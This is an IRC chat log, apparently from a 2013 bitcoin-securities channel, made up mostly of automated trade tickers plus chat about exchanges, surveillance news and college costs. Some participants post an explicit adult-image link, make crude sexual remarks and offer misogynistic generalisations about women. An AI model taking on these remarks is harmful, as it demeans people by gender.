BTC [+] Jun 21 21:00:23 [BTCTC] [ASICMINER-PT] 1 @ 3.19899 BTC [+] Jun 21 21:00:24 [BTCTC] [S.MPOE-PT] 1 @ 0.00077 BTC [+] Jun 21 21:00:45 i feel like these DMS assets are gonna implode Jun 21 21:00:53 [BTCTC] [DMS.SELLING] 10 @ 0.0381 = 0.381 BTC [+] Jun 21 21:01:15 [BTCTC] [TAT.ASICMINER] 12 @ 0.0318 = 0.3816 BTC [+] Jun 21 21:01:19 something isnt right with them Jun 21 21:01:48 [BTCTC] [DMS.SELLING] 39 @ 0.0385 = 1.5015 BTC [+] Jun 21 21:01:54 [BTCTC] [TAT.ASICMINER] 56 @ 0.0318 = 1.7808 BTC [+] Jun 21 21:02:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0318 BTC [+] Jun 21 21:03:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.0318 = 0.1272 BTC [+] Jun 21 21:03:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.0318 = 0.3816 BTC [+] Jun 21 21:03:37 [BTCTC] [BASIC-MINING] 1 @ 1.49 BTC [+] Jun 21 21:03:51 ;; seen smickles Jun 21 21:03:51 smickles was last seen in #bitcoin-assets 11 weeks, 1 day, 2 hours, 21 minutes, and 16 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Jun 21 21:04:17 [BTCTC] [DMS.SELLING] 100 @ 0.0385 = 3.85 BTC [+] Jun 21 21:04:22 [BTCTC] [TAT.ASICMINER] 27 @ 0.0319 = 0.8613 BTC [+] Jun 21 21:05:54 [HAVELOCK] [ASICM] 1 @ 0.03189 BTC [+] Jun 21 21:06:28 There's easier methods... like just transfering the damn money. Jun 21 21:07:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0319 BTC [+] Jun 21 21:07:58 [BTCTC] [ASICMINER-PT] 1 @ 3.198799 BTC [-] Jun 21 21:08:00 [BTCTC] [ASICMINER-PT] 1 @ 3.1988 BTC [+] Jun 21 21:08:12 [HAVELOCK] [ASICM] 17 @ 0.03189 = 0.5421 BTC [+] Jun 21 21:08:13 [HAVELOCK] [ASICM] 150 @ 0.03189 = 4.7835 BTC [+] Jun 21 21:08:14 [HAVELOCK] [ASICM] 5 @ 0.0319 = 0.1595 BTC [+] Jun 21 21:08:16 [HAVELOCK] [ASICM] 478 @ 0.0319 = 15.2482 BTC [+] Jun 21 21:08:20 LibertyBit, a bitcoin exchange registered in Canada has announced its temporary closure. It says that this has come as a result of bank account closures and fraudulent account activity. The exchange had been acclaimed by Reddit users for use of the Google Authenticator for two-factor authentication to increase security. Ultimately, this has not helped the business remain trouble free. Jun 21 21:09:28 [HAVELOCK] [ASICM] 1 @ 0.0319 BTC [+] Jun 21 21:11:02 [HAVELOCK] [ASICM] 21 @ 0.0319 = 0.6699 BTC [+] Jun 21 21:11:49 i haven't seen any of the trades post to @MPEx1 -- is that because of mpexbot being gone? Jun 21 21:11:59 well, not since the 11th of june... Jun 21 21:12:21 https://twitter.com/mpex1 Jun 21 21:12:24 MPEx (MPEx1) on Twitter Jun 21 21:13:06 functional infrastructure is overrated. just look at LibertyBit. Jun 21 21:13:14 [HAVELOCK] [ASICM] 10 @ 0.032 = 0.32 BTC [+] Jun 21 21:14:20 [BTCTC] [ASICMINER-PT] 2 @ 3.1988 = 6.3976 BTC [+] Jun 21 21:14:45 [BTCTC] [ASICMINER-PT] 1 @ 3.1989 BTC [+] Jun 21 21:14:57 ;;seen mpexbot Jun 21 21:15:22 damnit gribble! lol Jun 21 21:15:57 ;; seen smickles Jun 21 21:16:04 daaaaag. Jun 21 21:18:24 mod6: Jun 21 21:18:25 mod6: Jun 21 21:18:27 mod6: Jun 21 21:18:31 is it snowing again? Jun 21 21:18:34 jkjk Jun 21 21:19:04 http://trilema.com/2013/the-state-banking-and-bitcoin/ Jun 21 21:19:09 thestringpuller sup ? Jun 21 21:19:09 [HAVELOCK] [ASICM] 7 @ 0.032 = 0.224 BTC [+] Jun 21 21:19:10 The state, banking and Bitcoin pe Trilema - Un blog de Mircea Popescu. Jun 21 21:19:43 thestringpuller: naw, not today. but lastnight we got hammered by some nasty thunderstorms until about 6am Jun 21 21:20:18 sirens going off a bunch of times etc. thought we might get a tornado. Jun 21 21:20:25 Jezzz do it right man. http://girls.twistys.com/preview/dum/062013/06-16-2013/brettrossi-p/photos/13.jpg Jun 21 21:20:38 looks like ozbot was offended Jun 21 21:20:55 jordandotdev you can use coinbr.com Jun 21 21:21:20 thank you mircea_popescu Jun 21 21:21:23 [BTCTC] [ASICMINER-PT] 3 @ 3.199 = 9.597 BTC [+] Jun 21 21:21:38 mod6 the mpexbot is not related to the twitter acct Jun 21 21:21:41 [BTCTC] [TAT.ASICMINER] 71 @ 0.0319 = 2.2649 BTC [+] Jun 21 21:21:43 [BTCTC] [TAT.ASICMINER] 9 @ 0.0319 = 0.2871 BTC [+] Jun 21 21:21:56 http://au.businessinsider.com/nsa-prism-keywords-for-domestic-spying-2013-6 Jun 21 21:22:28 and i have no idea why twitter is not publishing Jun 21 21:22:41 mircea_popescu: i didn't think it was, but just thought i'd ask. Jun 21 21:22:44 thx Jun 21 21:22:57 i am sweeping the dictionary in the inonosphere with military intelligence looking for steve case, but i only see scully Jun 21 21:23:05 [BTCTC] [ASICMINER-PT] 3 @ 3.199 = 9.597 BTC [+] Jun 21 21:23:05 scully ?! Jun 21 21:23:07 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [+] Jun 21 21:23:08 da fuck is that ? Jun 21 21:23:08 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [+] Jun 21 21:23:13 dunno Jun 21 21:23:13 [BTCTC] [ASICMINER-PT] 1 @ 3.209 BTC [+] Jun 21 21:23:14 [BTCTC] [ASICMINER-PT] 3 @ 3.21 = 9.63 BTC [+] Jun 21 21:23:14 doesnt say. Jun 21 21:23:15 [BTCTC] [ASICMINER-PT] 2 @ 3.212 = 6.424 BTC [+] Jun 21 21:23:22 Priavacy Jun 21 21:23:23 lmao Jun 21 21:24:00 veggie Jun 21 21:24:06 jihad supercomputer. Jun 21 21:25:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.193001 BTC [-] Jun 21 21:25:42 [BTCTC] [ASICMINER-PT] 1 @ 3.212 BTC [+] Jun 21 21:26:17 [BTCTC] [ASICMINER-PT] 2 @ 3.212 = 6.424 BTC [+] Jun 21 21:26:59 enjoyed the post mp Jun 21 21:27:15 [BTCTC] [TAT.ASICMINER] 40 @ 0.0318 = 1.272 BTC [-] Jun 21 21:27:17 wouldve liked to read more detail about possible futures Jun 21 21:27:18 whoo asicminers blowin up Jun 21 21:27:20 [BTCTC] [TAT.ASICMINER] 87 @ 0.031999 = 2.7839 BTC [+] Jun 21 21:27:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.032 = 0.64 BTC [+] Jun 21 21:27:46 [BTCTC] [TAT.ASICMINER] 553 @ 0.032 = 17.696 BTC [+] Jun 21 21:27:47 and what parts of the past will/should/might be saved Jun 21 21:28:25 [BTCTC] [TAT.ASICMINER] 47 @ 0.032 = 1.504 BTC [+] Jun 21 21:28:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.032 = 0.16 BTC [+] Jun 21 21:29:38 ya well, how should i know Jun 21 21:30:28 some leader you are! Jun 21 21:30:28 [BTCTC] [ASICMINER-PT] 1 @ 3.228 BTC [+] Jun 21 21:30:30 [BTCTC] [DMS.MINING] 9 @ 0.015989 = 0.1439 BTC [-] Jun 21 21:30:47 hey Jun 21 21:31:02 [BTCTC] [DMS.MINING] 9 @ 0.014211 = 0.1279 BTC [-] Jun 21 21:31:10 [BTCTC] [DMS.MINING] 20 @ 0.01421 = 0.2842 BTC [-] Jun 21 21:31:12 [BTCTC] [DMS.MINING] 50 @ 0.0142 = 0.71 BTC [-] Jun 21 21:31:14 [HAVELOCK] [ASICM] 2 @ 0.0321 = 0.0642 BTC [+] Jun 21 21:31:16 [BTCTC] [DMS.MINING] 1 @ 0.0142 BTC [-] Jun 21 21:31:17 [HAVELOCK] [ASICM] 3 @ 0.032439 = 0.0973 BTC [+] Jun 21 21:31:18 [BTCTC] [DMS.MINING] 30 @ 0.0131 = 0.393 BTC [-] Jun 21 21:31:18 [BTCTC] [DMS.MINING] 50 @ 0.01301 = 0.6505 BTC [-] Jun 21 21:31:20 [BTCTC] [DMS.MINING] 1 @ 0.013 BTC [-] Jun 21 21:31:25 bitcoin is not on the list of terrorist words Jun 21 21:31:49 [BTCTC] [DMS.MINING] 50 @ 0.01599 = 0.7995 BTC [+] Jun 21 21:32:05 i wonder if mp makes it to the list before btc. Jun 21 21:32:31 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0058 = 0.0116 BTC [-] Jun 21 21:32:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0057 BTC [-] Jun 21 21:32:34 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.005303 = 0.0795 BTC [-] Jun 21 21:32:49 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005302 = 0.0265 BTC [-] Jun 21 21:32:56 [BTCTC] [DMS.PURCHASE] 48 @ 0.054282 = 2.6055 BTC [-] Jun 21 21:32:57 [HAVELOCK] [ASICM] 4 @ 0.032438 = 0.1298 BTC [-] Jun 21 21:32:58 "who think the others are at most a resource and in general not a very valuable one" Jun 21 21:33:02 lolololol white america Jun 21 21:33:33 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0052 = 0.052 BTC [-] Jun 21 21:33:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0051 BTC [-] Jun 21 21:34:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005071 BTC [-] Jun 21 21:34:01 is there a site to see all the places tobuy bitcoin stocks Jun 21 21:34:25 mpex.co Jun 21 21:34:29 coinbr.com Jun 21 21:34:36 btct.co Jun 21 21:34:40 bitfunder.com Jun 21 21:34:50 havelockinvestments.com Jun 21 21:35:05 those are the most frequented Jun 21 21:35:08 then you have Jun 21 21:35:13 picostocks.com Jun 21 21:35:20 cryptostocks.com Jun 21 21:35:33 and maybe some others of ill repute Jun 21 21:35:59 never heard of any of those Jun 21 21:36:06 haha Jun 21 21:36:58 [BTCTC] [PAJKA.BOND] 8 @ 0.04947 = 0.3958 BTC [-] Jun 21 21:37:18 as always, invest only what you wish to lose Jun 21 21:37:20 ;) Jun 21 21:38:01 thebombdoe you are on it Jun 21 21:39:53 [HAVELOCK] [HIM] 1 @ 0.281 BTC [+] Jun 21 21:42:21 [HAVELOCK] [ASICM] 20 @ 0.032 = 0.64 BTC [-] Jun 21 21:42:59 [HAVELOCK] [ASICM] 10 @ 0.032 = 0.32 BTC [-] Jun 21 21:43:34 Bubba the love sponge and E.T. are in the basement debubgging their defcon presentation, something about data havens and World Domination. Jun 21 21:44:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.0324 = 0.1296 BTC [+] Jun 21 21:45:07 [HAVELOCK] [ASICM] 8 @ 0.03133 = 0.2506 BTC [-] Jun 21 21:47:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.0324 = 0.0972 BTC [+] Jun 21 21:47:29 [HAVELOCK] [ASICM] 53 @ 0.03143 = 1.6658 BTC [+] Jun 21 21:47:31 [HAVELOCK] [ASICM] 8 @ 0.031425 = 0.2514 BTC [-] Jun 21 21:47:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0052 BTC [+] Jun 21 21:47:49 [BTCTC] [TAT.VIRTUALMINE] 199 @ 0.005002 = 0.9954 BTC [-] Jun 21 21:47:50 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005001 = 0.2501 BTC [-] Jun 21 21:48:00 [HAVELOCK] [ASICM] 57 @ 0.0314 = 1.7898 BTC [-] Jun 21 21:48:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.0324 = 0.324 BTC [+] Jun 21 21:49:13 haha thanks guys :) thickasthieves, thanks for all your work :) i own a fair number on havelock Jun 21 21:49:18 [BTCTC] [TAT.ASICMINER] 85 @ 0.0324 = 2.754 BTC [+] Jun 21 21:49:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.0324 = 0.81 BTC [+] Jun 21 21:49:57 Top Secret: Bring your mossberg, quiche and cocaine to the speakeasy, after all it is 1984. Jun 21 21:51:35 np! Jun 21 21:51:53 must be btc killer or smth https://bitcointalk.org/index.php?topic=240048.0;topicseen Jun 21 21:52:46 [BTCTC] [S.MPOE-PT] 30 @ 0.00077 = 0.0231 BTC [+] Jun 21 21:53:11 [BTCTC] [S.DICE-PT] 1 @ 0.002702 BTC [+] Jun 21 21:53:42 now introducing ocinbit! Jun 21 21:53:57 whoops, coinbit* Jun 21 21:54:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.031601 BTC [-] Jun 21 21:54:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0324 = 0.0648 BTC [+] Jun 21 21:55:11 [BTCTC] [BITVPS] 10 @ 0.001276 = 0.0128 BTC [-] Jun 21 21:55:18 [BTCTC] [ASICMINER-PT] 1 @ 3.2279 BTC [-] Jun 21 21:56:19 https://blockchain.info/address/15HpBoo2DqaeJPW28ATzZMNnUTfqZQYA9H Jun 21 21:56:21 Bitcoin Address 15HpBoo2DqaeJPW28ATzZMNnUTfqZQYA9H Jun 21 21:56:25 soo garr repaid the treasury. Jun 21 21:56:54 Now introducing thecointhatwantedtobebetterthantherestbyattackingtheirestablishedfortresswithaslingshotbecauseithasnothingtoofferbutbeingpunyclonecoin Jun 21 21:58:09 it will take time, but garr will be okay in the long run, i think Jun 21 21:58:28 eh? Jun 21 21:58:48 eh, eh? Jun 21 21:59:13 garr will be okay cuz noobs Jun 21 21:59:16 probly only reason Jun 21 21:59:17 nothingtoofferbutbeingpunyclonecoin << missed an a Jun 21 21:59:25 -- Jun 21 21:59:26 Hello kako, Jun 21 21:59:26 You've probably been wondering what's been happening with Crypto Street. We've been working closely with various regulatory agencies and things are taking a bit longer than we had hoped. In the mean time, we've revamped our engine and shifted to a crypto-only exchange. That means that (for now) you won't be able to fund your account with USD, but we hope that'll change soon. Jun 21 21:59:26 dammit Jun 21 21:59:27 [BTCTC] [S.MPOE-PT] 9 @ 0.00078 = 0.007 BTC [+] Jun 21 21:59:34 https://bitcointalk.org/index.php?topic=239841.msg2542423#msg2542423 pretty lulzy Jun 21 21:59:43 FREE MONEY - Buy zero days, get 25% profit Jun 21 22:00:21 "we are victioms of our own success thats why no fiat trading" Jun 21 22:01:16 these are the third bringing fx to bitcoin guys or smth Jun 21 22:01:21 or fourth Jun 21 22:01:30 i mean Jun 21 22:01:32 wall street Jun 21 22:01:34 sry Jun 21 22:02:06 are corporate espionagers victims of success or the cause of it? Jun 21 22:02:10 \haha Jun 21 22:02:25 [MPEX] [S.MPOE] 6273 @ 0.00077637 = 4.8702 BTC [+] Jun 21 22:02:26 [MPEX] [S.MPOE] 3506 @ 0.00077732 = 2.7253 BTC [+] Jun 21 22:03:51 http://thebelltowers.com/2013/06/20/depositing-a-little-common-sense-into-law/ Jun 21 22:04:00 Depositing a Little Common Sense into the Law Jun 21 22:04:24 [BTCTC] [GSDPT] 2 @ 0.002126 = 0.0043 BTC [-] Jun 21 22:06:15 so $5000 deposits from now on Jun 21 22:06:16 got it Jun 21 22:08:46 [HAVELOCK] [ASICM] 23 @ 0.0314 = 0.7222 BTC [-] Jun 21 22:09:46 just dont do multiple $5000 deposits Jun 21 22:11:10 or any Jun 21 22:11:35 [BTCTC] [S.DICE-PT] 1 @ 0.002702 BTC [+] Jun 21 22:12:36 [BTCTC] [PAJKA.BOND] 1 @ 0.04986 BTC [+] Jun 21 22:12:37 [BTCTC] [PAJKA.BOND] 1 @ 0.04986 BTC [+] Jun 21 22:13:01 but how much of my money is it okay for me to have? Jun 21 22:13:23 ^ Jun 21 22:13:29 and on what time scale right? Jun 21 22:13:35 [BTCTC] [S.DICE-PT] 1 @ 0.002702 BTC [+] Jun 21 22:14:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005893 BTC [+] Jun 21 22:14:49 [BTCTC] [S.DICE-PT] 1 @ 0.002551 BTC [-] Jun 21 22:17:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0316 BTC [-] Jun 21 22:17:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0316 BTC [-] Jun 21 22:17:59 i hold 45k bitcoinsand 4500k usd Jun 21 22:18:34 JUST KIDDING, more like .4bitcoins and 45 dollars ahah, poor highschool kid here Jun 21 22:19:42 are you Will? Jun 21 22:20:01 [BTCTC] [COGNITIVE] 1 @ 0.286539 BTC [+] Jun 21 22:22:12 [BTCTC] [S.MPOE-PT] 2 @ 0.00078 = 0.0016 BTC [+] Jun 21 22:23:04 [BTCTC] [DMS.MINING] 1 @ 0.01589 BTC [-] Jun 21 22:23:22 [BTCTC] [DMS.MINING] 9 @ 0.01589 = 0.143 BTC [-] Jun 21 22:24:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.0316 = 0.1896 BTC [-] Jun 21 22:24:28 nah Jun 21 22:25:07 http://www.reddit.com/r/Bitcoin/comments/1groob/please_forgive_me_but_i_dont_know_how_to_make_a/ Jun 21 22:25:12 ^ needs screenshot Jun 21 22:25:14 Name is Nate, im a lucker on the bitcoin talk forms haha. Jun 21 22:25:46 i hold about 4500 btc Jun 21 22:25:51 in case it rains Jun 21 22:26:06 wanna donate one to my college fund? Jun 21 22:26:16 psssh Jun 21 22:26:29 what is college going to teach you Jun 21 22:26:38 haah true Jun 21 22:26:54 how about a small gift for becoming an Eagle Scout Jun 21 22:27:02 degrees are nice if you can afford them Jun 21 22:27:10 btc merit badge Jun 21 22:27:32 there's a larger and larger percentage of americans who cannot afford college Jun 21 22:27:47 so it seems less valuable than it used to to me Jun 21 22:28:08 thereis an advanded computing merit badge, maybe one day we will see a btc history one ahah Jun 21 22:28:24 and i am agreed, its 45K a year for an average school Jun 21 22:28:47 45k yearly is arguable middle class where i live Jun 21 22:29:00 so a middle class citizen can afford college but nothing else Jun 21 22:29:06 no food, no shelter, no fun Jun 21 22:29:25 just institutionalized learning Jun 21 22:29:27 http://www.guardian.co.uk/uk/2013/jun/21/gchq-cables-secret-world-communications-nsa Jun 21 22:29:33 GCHQ taps fibre-optic cables for secret access to world's communications | UK news | guardian.co.uk Jun 21 22:29:34 [MPEX] [S.MPOE] 600 @ 0.00077956 = 0.4677 BTC [+] Jun 21 22:29:36 [MPEX] [S.MPOE] 1250 @ 0.00078299 = 0.9787 BTC [+] Jun 21 22:29:37 so you can socialize with your peers at your new career Jun 21 22:29:40 "SNOWDEN SAYS TEMPORA IS BIGGER THAN PRISM" Jun 21 22:29:45 are you in the states? Jun 21 22:30:15 and pretty much... its 45k a year to drink and fuck as many people as you can without failing Jun 21 22:30:39 http://www.theverge.com/2013/6/21/4452222/kickstarter-bans-pickup-artist-guides-after-allowing-controversial-manual Jun 21 22:30:41 terrible Jun 21 22:30:41 Kickstarter bans seduction guides after backlash over funding 'rape manual' | The Verge Jun 21 22:31:04 damn Jun 21 22:31:36 [BTCTC] [BASIC-MINING] 1 @ 1.49999 BTC [+] Jun 21 22:31:38 [BTCTC] [BASIC-MINING] 1 @ 1.5 BTC [+] Jun 21 22:34:40 it's not even a rape manual Jun 21 22:34:48 msogynist maybe Jun 21 22:35:03 FellowTraveler of OT does the same thing Jun 21 22:35:41 [BTCTC] [ASICMINER-PT] 1 @ 3.228 BTC [+] Jun 21 22:36:24 [HAVELOCK] [ASICM] 57 @ 0.031181 = 1.7773 BTC [-] Jun 21 22:37:14 sooo kickstarter figures it's just like a bank Jun 21 22:37:18 except without any actual requirements Jun 21 22:38:01 kickstarter is okay because it's web 3.0,bro Jun 21 22:38:19 [BTCTC] [ASICMINER-PT] 1 @ 3.229 BTC [+] Jun 21 22:38:28 kickstarter seems overtly sensitive to lady pressure Jun 21 22:38:42 thats what happens when you hire women Jun 21 22:38:46 [BTCTC] [ASICMINER-PT] 7 @ 3.23 = 22.61 BTC [+] Jun 21 22:39:10 nah, that's what happens in america. half the country is in this 'privilege' and 'rape culture' mindspace. Jun 21 22:39:17 by the looks of things, men will fill the reverse role soon Jun 21 22:39:25 wasn't the "feminist" who whined male? Jun 21 22:39:26 [BTCTC] [ASICMINER-PT] 2 @ 3.234 = 6.468 BTC [+] Jun 21 22:39:27 wives make all the money decisions Jun 21 22:39:34 ^ Jun 21 22:39:42 funniest shit i've read all day Jun 21 22:39:49 that's why americans are broke too Jun 21 22:39:53 lol Jun 21 22:40:00 [BTCTC] [ASICMINER-PT] 1 @ 3.234 BTC [+] Jun 21 22:40:10 [BTCTC] [BTC-TRADING-PT] 1 @ 0.5865 BTC [-] Jun 21 22:40:17 men are all about being stay at home dads now Jun 21 22:40:17 [BTCTC] [ASICMINER-PT] 1 @ 3.234 BTC [+] Jun 21 22:40:25 getting fat and chilling Jun 21 22:40:32 i do that sometimes myself Jun 21 22:40:38 it's fun to pretend to work all day Jun 21 22:40:39 women want power Jun 21 22:40:44 men are lazy Jun 21 22:40:50 its a role reversal Jun 21 22:40:51 [BTCTC] [ASICMINER-PT] 1 @ 3.23485 BTC [+] Jun 21 22:40:56 pankkake male feminists are super popular in america these days Jun 21 22:40:58 men are not properly engaged Jun 21 22:41:02 i enjoy being glutenous Jun 21 22:41:08 they're the worst Jun 21 22:41:14 the bombdoe full of gluten? Jun 21 22:41:31 he means he's soft Jun 21 22:41:32 meh. the whole country can't get its head around proper power structures. Jun 21 22:41:36 [BTCTC] [ASICMINER-PT] 2 @ 3.2349 = 6.4698 BTC [+] Jun 21 22:41:50 yes Jun 21 22:41:55 being fat is the best Jun 21 22:42:01 haah brb Jun 21 22:42:03 the dominant paradigm is that you're born entitled to rights, which rapidly expands to being born entitled to fairness. Jun 21 22:42:37 world however is unfair and trying to make it fair is not a good use of energy. Jun 21 22:43:06 the other extreme isnt that great either Jun 21 22:43:18 so we must push and pull Jun 21 22:43:27 i just seek power Jun 21 22:43:30 [MPEX] [S.MPOE] 4879 @ 0.00078299 = 3.8202 BTC [+] Jun 21 22:43:32 [MPEX] [S.MPOE] 971 @ 0.00078501 = 0.7622 BTC [+] Jun 21 22:43:33 i seek freedom Jun 21 22:43:42 probly the same thing Jun 21 22:43:46 topologically identical? Jun 21 22:44:24 yet we spend out days not excercising power nor roaming free Jun 21 22:44:27 our* Jun 21 22:44:34 well, first one must acquire it. Jun 21 22:44:47 in a sense we already have it Jun 21 22:44:59 do go on Jun 21 22:45:04 just stop Jun 21 22:45:16 stop playing the game Jun 21 22:45:18 ah yes, the mendicant lifestyle. Jun 21 22:45:24 can't say as it appeals terribly. Jun 21 22:45:35 you see i enjoy buying girls flowers Jun 21 22:45:53 you can pick them yourself Jun 21 22:46:02 and mendicants are smelly and unlikely to find access to the sweetest of ladyparts Jun 21 22:47:10 i guess Jun 21 22:47:12 also i don't really mean flowers, i mean the various shiny objects they covet. Jun 21 22:47:38 so you like the game Jun 21 22:47:43 most do Jun 21 22:47:58 there is only the game Jun 21 22:48:20 paper chase or pussy chase, there is only the game. Jun 21 22:49:50 [BTCTC] [ASICMINER-PT] 1 @ 3.2487 BTC [+] Jun 21 22:49:52 [BTCTC] [ASICMINER-PT] 1 @ 3.249 BTC [+] Jun 21 22:49:56 [BTCTC] [ASICMINER-PT] 10 @ 3.25 = 32.5 BTC [+] Jun 21 22:51:20 [BTCTC] [ASICMINER-PT] 6 @ 3.279 = 19.674 BTC [+] Jun 21 22:52:16 [BTCTC] [ASICMINER-PT] 3 @ 3.279 = 9.837 BTC [+] Jun 21 22:52:17 [BTCTC] [ASICMINER-PT] 10 @ 3.28 = 32.8 BTC [+] Jun 21 22:54:53 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199995 BTC [+] Jun 21 22:55:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.032389 BTC [+] Jun 21 22:55:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.03239 = 0.162 BTC [+] Jun 21 22:55:32 [BTCTC] [TAT.ASICMINER] 21 @ 0.0324 = 0.6804 BTC [+] Jun 21 22:55:33 [BTCTC] [ASICMINER-PT] 1 @ 3.259 BTC [-] Jun 21 22:55:35 [BTCTC] [ASICMINER-PT] 1 @ 3.28 BTC [+] Jun 21 22:56:56 [BTCTC] [ASICMINER-PT] 2 @ 3.279 = 6.558 BTC [-] Jun 21 22:56:58 [BTCTC] [ASICMINER-PT] 10 @ 3.28 = 32.8 BTC [+] Jun 21 22:57:43 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [-] Jun 21 23:00:21 .r Jun 21 23:00:23 Gox | Buy: $109.50 Sell: $109.99 Last: $109.99 High: $115.01 Low: $107.57 Jun 21 23:00:24 Weex | API Error Jun 21 23:02:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.032489 = 0.1624 BTC [+] Jun 21 23:02:33 . Jun 21 23:02:37 .help Jun 21 23:02:37 All commands can be processed in channel or in PM Jun 21 23:02:37 Commands: .bait .count .diff .earn .exchange .nethash .rates .lcrates .tslb Jun 21 23:02:46 .exchange Jun 21 23:02:46 Usage: exchange [amount] [currency_from] [currency_to] Jun 21 23:02:59 scuse me. moving to pm Jun 21 23:04:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0285 BTC [-] Jun 21 23:05:29 [BTCTC] [ASICMINER-PT] 1 @ 3.279 BTC [+] Jun 21 23:06:26 [BTCTC] [ASICMINER-PT] 10 @ 3.28 = 32.8 BTC [+] Jun 21 23:08:25 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [+] Jun 21 23:08:31 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005867 = 0.0117 BTC [-] Jun 21 23:08:53 [BTCTC] [DMS.PURCHASE] 50 @ 0.054282 = 2.7141 BTC [-] Jun 21 23:11:04 [HAVELOCK] [ASICM] 1 @ 0.03185 BTC [+] Jun 21 23:11:25 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Jun 21 23:11:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.031111 BTC [+] Jun 21 23:12:10 [BTCTC] [TAT.ASICMINER] 66 @ 0.03249 = 2.1443 BTC [+] Jun 21 23:14:41 [BTCTC] [TAT.ASICMINER] 55 @ 0.03249 = 1.787 BTC [+] Jun 21 23:15:38 [BTCTC] [PAJKA.BOND] 1 @ 0.04986 BTC [+] Jun 21 23:15:40 [BTCTC] [PAJKA.BOND] 10 @ 0.049869 = 0.4987 BTC [+] Jun 21 23:15:42 [BTCTC] [PAJKA.BOND] 2 @ 0.0499 = 0.0998 BTC [+] Jun 21 23:15:43 [BTCTC] [PAJKA.BOND] 5 @ 0.05 = 0.25 BTC [+] Jun 21 23:17:08 [BTCTC] [S.DICE-PT] 3 @ 0.002702 = 0.0081 BTC [+] Jun 21 23:17:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0285 BTC [-] Jun 21 23:20:40 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005103 = 0.2552 BTC [-] Jun 21 23:20:42 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005102 = 0.0255 BTC [-] Jun 21 23:20:49 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005102 = 0.0255 BTC [-] Jun 21 23:20:53 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.005101 = 0.5101 BTC [-] Jun 21 23:21:35 [BTCTC] [TAT.ASICMINER] 49 @ 0.031111 = 1.5244 BTC [+] Jun 21 23:21:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.031111 BTC [+] Jun 21 23:22:25 [BTCTC] [ASICMINER-PT] 1 @ 3.276999 BTC [+] Jun 21 23:23:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03111 BTC [-] Jun 21 23:23:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.031102 = 0.1555 BTC [-] Jun 21 23:23:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.0311 = 0.3421 BTC [-] Jun 21 23:24:46 [BTCTC] [ASICMINER-PT] 1 @ 3.277 BTC [+] Jun 21 23:26:27 [BTCTC] [MININGCO.ETF] 1 @ 0.8199 BTC [+] Jun 21 23:26:39 [BTCTC] [BITVPS] 54 @ 0.001252 = 0.0676 BTC [-] Jun 21 23:26:41 [BTCTC] [BITVPS] 946 @ 0.001252 = 1.1844 BTC [-] Jun 21 23:27:16 [BTCTC] [MININGCO.ETF] 4 @ 0.8299 = 3.3196 BTC [+] Jun 21 23:27:30 hi guys Jun 21 23:27:49 I hear Mr. P wants a word? Jun 21 23:28:32 what is your site again dooglus, I have not even checked it out Jun 21 23:28:40 MP says youre doing it wrong :) Jun 21 23:29:19 [BTCTC] [ASICMINER-PT] 5 @ 3.276999 = 16.385 BTC [-] Jun 21 23:29:42 Good time to sell :) Jun 21 23:29:46 glad to see you here dooglus Jun 21 23:31:20 [BTCTC] [ASICMINER-PT] 1 @ 3.193001 BTC [-] Jun 21 23:31:22 [BTCTC] [ASICMINER-PT] 1 @ 3.192 BTC [-] Jun 21 23:32:04 heh, I'm not surprised Jun 21 23:32:24 it's https://just-dice.com Jun 21 23:32:24 [BTCTC] [PAJKA.BOND] 10 @ 0.049999 = 0.5 BTC [-] Jun 21 23:32:25 [HAVELOCK] [SDICE] 12 @ 0.20001 = 2.4001 BTC [+] Jun 21 23:33:01 [HAVELOCK] [ASICM] 7 @ 0.03185 = 0.223 BTC [+] Jun 21 23:33:06 here's the relevant commentary Jun 21 23:33:08 [22:44] the genius idea is actually a very bad idea, but anyway. Jun 21 23:33:09 [22:44] why is it bad? Jun 21 23:33:09 [22:44] it certainly doesn't maximize Doogs profit Jun 21 23:33:09 [22:44] it will wreck the site. Jun 21 